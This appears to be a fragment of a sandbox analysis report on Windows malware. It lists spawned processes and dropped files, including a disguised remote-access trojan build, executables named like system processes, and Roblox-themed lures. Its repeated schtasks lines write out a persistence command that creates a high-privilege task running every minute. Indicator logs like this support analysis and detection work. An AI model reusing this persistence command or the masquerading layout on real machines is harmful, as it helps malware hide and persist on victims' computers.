C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\winNet\spoolsv.exe
C:\winNet\spoolsv.exe
C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe
C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe
C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe
"C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe"
C:\DriversavessessionDlldhcp\Roblox.exe
C:\DriversavessessionDlldhcp\Roblox.exe
C:\winNet\wscript.exe
C:\winNet\wscript.exe
C:\winNet\wscript.exe.exe
"C:\winNet\wscript.exe.exe"
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe
"C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe"
C:\Users\All Users\Microsoft\eHome\wininit.exe
"C:\Users\All Users\Microsoft\eHome\wininit.exe"
C:\winNet\lsm.exe
C:\winNet\lsm.exe
C:\winNet\Bloxstrap.exe
C:\winNet\Bloxstrap.exe
C:\Windows\Offline Web Pages\Refcrt.exe
"C:\Windows\Offline Web Pages\Refcrt.exe"
C:\winNet\lsm.exe.exe
"C:\winNet\lsm.exe.exe"
C:\Windows\Offline Web Pages\Refcrt.exe.exe
"C:\Windows\Offline Web Pages\Refcrt.exe.exe"
C:\Users\All Users\Microsoft\eHome\wininit.exe.exe
"C:\Users\All Users\Microsoft\eHome\wininit.exe.exe"
C:\winNet\Bloxstrap.exe.exe
"C:\winNet\Bloxstrap.exe.exe"
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\winNet\Idle.exe
C:\winNet\Idle.exe
C:\Users\Public\Pictures\sddsfsdf.exe
C:\Users\Public\Pictures\sddsfsdf.exe
C:\winNet\wscript.exe
C:\winNet\wscript.exe
C:\winNet\wscript.exe.exe
"C:\winNet\wscript.exe.exe"
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
Network
Files
\Users\Admin\AppData\Local\Temp\Youtube.exe
C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
C:\Users\Admin\AppData\Local\Temp\Result.exe
\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
\Users\Admin\AppData\Local\Temp\solara.exe
C:\winNet\we9fgyC144zVOkGk.vbe
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe
C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe
\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
\Users\Admin\AppData\Local\Temp\Frage build.exe
C:\Users\Admin\AppData\Local\Temp\Cab408B.tmp
C:\Users\Admin\AppData\Local\Temp\Tar40FB.tmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
C:\Users\Admin\AppData\Local\Temp\KAuKjb5uOJ.bat
C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Windows\Installer\MSI58FF.tmp
C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\audiodg.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1WQDCN01NHEORDRND4P4.temp
C:\Users\Admin\AppData\Local\Temp\eugwdvhdxi
C:\Users\Admin\AppData\Local\Temp\ExtE3IRK6T
C:\Users\Admin\AppData\Local\Temp\CWltOzyXb2